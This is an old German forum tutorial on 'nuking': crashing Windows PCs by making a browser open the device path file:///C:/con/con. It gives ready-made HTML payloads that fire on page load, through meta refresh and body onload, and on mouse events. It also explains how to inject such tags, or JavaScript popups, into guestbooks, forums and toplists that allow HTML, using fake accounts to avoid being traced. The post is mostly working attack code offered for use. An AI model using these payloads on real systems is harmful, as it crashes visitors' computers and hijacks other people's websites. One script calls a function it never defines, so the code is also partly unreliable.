Nuken

Dieses Thema im Forum "Security Tutorials" wurde erstellt von KillerKarnickel, 2. Dezember 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 2. Dezember 2005
    Und nommal was^^



    ALLE METHODEN HIER WURDEN GEPRÜFT UND FUNKTIONIEREN AUCH.

    Inhalts Angabe:
    0) Was ist Nuken ?
    0.1)Wo kann ich das Nuken anwenden ?
    1) Nuken in einem HTML Dokument. Nuken in einer Email.
    2)Spezielle HTML Tags für den Nuke- gebrauch.
    3)Secrets zu Toplisten/Gästebücher/Foren die HTML erlauben.


    Was ist Nuken ?

    Nuken ist wenn man als Windoof User einen Bluescreen sieht.
    z.B.: Windows schwerer Ausnahmefehler.
    Dieser kann da durch entstehen das eine Spezielle
    Datei geöffnet werden soll die auf deinem PC
    nicht enthalten ist. Z.B.: file:///C:con/con
    Es kann auch file:///C:devil/devil da stehen es ist im Grunde
    völlig egal was dar steht nur eins darf da nichts stehen:
    Sonderzeichen wie ? ! " %$ & usw.



    Wo kann ich das Nuken anwenden ?

    Also entweder wenn Du eine Website hast
    (das ist zwar dann etwas doof aber na ja musst du wissen.)
    oder in einer Topliste oder in einer Email, eigentlich
    überall wo man HTML verwenden darf.


    Nuken in einem HTML Dokument.

    Man kann nur Nuken wenn man
    Die file:///C:con/con auslöst. Man kann es nur auslösen
    wenn man den Broswer dazu bringt dieses File zu laden.
    hm wie mach ich das bloß. Jetzt müsste es in HTML
    nen Event handler geben. also mal nachsehen.
    was ist mit ONMOUSEOVER ? Ja der geht doch. Jetzt macht
    man nur noch nen Link wo man ein Bild mit einbindet.
    so sieht das dann aus:
    <a href="http://www.devil.xtor.de/" OnMouseOver="window.open('file:///C:/con/con')"><img src="bildurl.gif"></a>
    Ist doch easy oder. JA Aber wie erreiche ich das der PC direkt beim Laden
    abstürzt ? Ist auch einfach. Man schreibt einfach einen
    Meta Tag der zwischen <head> </head> steht. z.B.:
    <meta http-equiv="refresh" content="0; URL=file:///C:con/con">
    Die Zahl 0 gibt hier an nach wie viel Sekunden Der Nuke geladen wird.
    Du kannst ja noch mit etwas HTML Verständnis mit den
    verschiedenen Event Handlern experimentieren.
    Und genau mit den Methoden wie oben beschrieben kann
    man in einer Email Nuken.
    Beim GMX kann man inline Dokumente versenden.
    Das bedeutet das man die seperatte HTML Datei
    direkt im Text der Email verendet werden kann


    Beispiel für die Anwendung der Tags:

    <ONMOUSEOVER> :
    <a href="www.devil.xtor.de" OnMoseOver="window.open('file:///C:/con/con')">
    <img src="bildurl.jpg"></a>
    <OnClick> :
    <p onClick="window.open('file:///C:/con/con')">Hallo hier gehts weiter</p>
    <body onload> :
    <body onload="window.open('file:///C:/con/con')">
    <OnMouseDown> : Bei gedrückter Maustaste
    <p OnMouseDown="window.open('file:///C:/con/con')">Hallo hier gehts weiter</p>
    <OnBlur> : Beim Verlassen des Elements
    <p OnBlur="window.open('file:///C:/con/con')">Hallo hier gehts weiter</p>


    Secrets zu Toplisten/Gästebücher/Foren:

    Du kennst doch bestimmt so Toplisten die jeden Tag
    Aktualisiert werden und so. Was wäre wenn jeder der
    die Toplist besucht auch gleichzeitig deine eigene Page
    geöffnet bekommen würde ohne auf deine zu Klicken.
    Und genau so was auch in Foren und Gästebüchern.
    Das würde einen mehrere 1000 Besucher pro Tag bringen.
    Wenn Du wissen willst wie das geht lies weiter.
    Also wie schon gesagt es muss HTML aktiv sein, sonst geht
    nichts. Nun fang ich hallt mal an :
    Du kennst doch den HTML Tag:

    <Meta http-equiv="refresh" content="0; URL=http://www.devil.xtor.de">

    Wenn der Tag in einem Gästebuch oder Forenbeitrag steht
    würde er bezwecken das nach 0 Sekunden die Seite:

    http://www.devil.xtor.de geladen wird.

    (Deshalb würde ich als Webmaster immer HTML in Gästebücher oder
    Foren ausstellen.)

    Das Problem bei den Foren ist halt das man sich deinen Beitrag
    ansehen muss damit deine Page geladen wird. Aber vielleicht
    sollte man den Tag in den Titel des Beitrages schreiben.
    Der wird ja schließlich geladen. Aber gebe nie deine richtige Email
    Adresse bei so etwas an, sonst kann es sein das dich der Webmaster dem das
    Gästebuch oder Forum gehört dich zu bombt mit Emails. In Toplisten
    ist so etwas zu machen schwieriger, weil die diesen META TAG NICHT zulassen.
    Aber dafür Javascript und einen EventHandler oder Link.
    Nun muss man nur noch ein kleines JScript haben was Deine Seite lädt.
    Es gibt bloß ein Problem. Es funktioniert nicht deine Page zu laden, wenn man
    nicht deinen Link berührt. Also hier habe ich nen Kleines Script das so was bewirkt.

    <script language="JAVASCRIPT">
    function devil()
    {
    var win;
    win=window.open ("http://www.devil.xtor.de","NeuesFenster","width=1000,height=800,resizable=yes");
    }
    </script>
    <a href="http://www.devil.xtor.de" onMouseOver="tupo()">DER LINK DER DAS FENSTER ÖFFNET</a>

    Ich weiss das da auch etwas HTML drin ist aber so Tag für links sind oft erlaubt.
    Oder schreib einfach den Nuke ins Gästebuch/Forum/Toplisten
    Das ist zwar etwas blöde aber na ja musst Du wissen.
    Hier noch mal der Nuke Code:

    <meta http-equiv="refresh" content="0; URL=file:///C:con/con">

    Am besten ist es wenn Du zuerst einen falschen (FAKE) Account
    dort anlegst und schaust ob dort HTML erlaubt ist. Dann
    benutze so Tags wie <b> <font color="lime"> oder so was.
    Wenn das nach deinem Eintrag zu sehen seien sollte kannst Du
    deinen Plan vergessen ansonsten würde ich mich sofort richtig eintragen
    und einen dieser HTML Codes anwenden.


    HF
     
  3. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.